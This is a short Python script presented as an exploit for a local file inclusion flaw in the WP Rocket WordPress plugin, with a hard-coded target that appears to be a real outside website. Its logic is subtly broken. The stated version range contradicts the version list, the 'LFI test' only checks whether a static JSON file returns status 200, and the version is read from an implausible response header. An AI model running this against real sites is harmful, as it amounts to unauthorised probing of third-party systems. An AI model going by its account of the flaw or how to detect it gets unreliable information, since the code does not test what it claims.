WP Rocket < 2.10.3 - Local File Inclusion (LFI)

1.  
2. import requests
3. import time
4.  
5. def check_wp_rocket_version(url):
6.     version_url = url + "/wp-rocket/css/rocket.css"
7.     try:
8.         response = requests.get(version_url)
9.         version = response.headers["X-Powered-By"]
10.         if "WP Rocket/" in version:
11.             version = version.split("/")[1]
12.             return version
13.     except Exception as e:
14.         print(f"Error occurred while fetching WP Rocket version: {e}")
15.     return None
16.  
17. def test_wp_rocket_lfi_bug(url):
18.     lfi_url = url + "/wp-rocket/inc/vendor/composer/installed.json"
19.     try:
20.         response = requests.get(lfi_url)
21.         if response.status_code == 200:
22.             return True
23.     except Exception as e:
24.         print(f"Error occurred while testing LFI: {e}")
25.     return False
26.  
27. def main():
28.     url = "http://arvatools.com"
29.     wp_rocket_version = check_wp_rocket_version(url)
30.     if wp_rocket_version:
31.         print(f"WP Rocket Version: {wp_rocket_version}")
32.         if wp_rocket_version in ["2.10.0", "2.10.1", "2.10.2", "2.10.3"]:
33.             result = test_wp_rocket_lfi_bug(url)
34.             if result:
35.                 print("LFI vulnerability found in WP Rocket")
36.             else:
37.                 print("LFI vulnerability not found in WP Rocket")
38.         else:
39.             print("WP Rocket version is not affected by the LFI bug")
40.     else:
41.         print("Unable to fetch WP Rocket version")
42.  
43. if __name__ == "__main__":
44.     main()
45.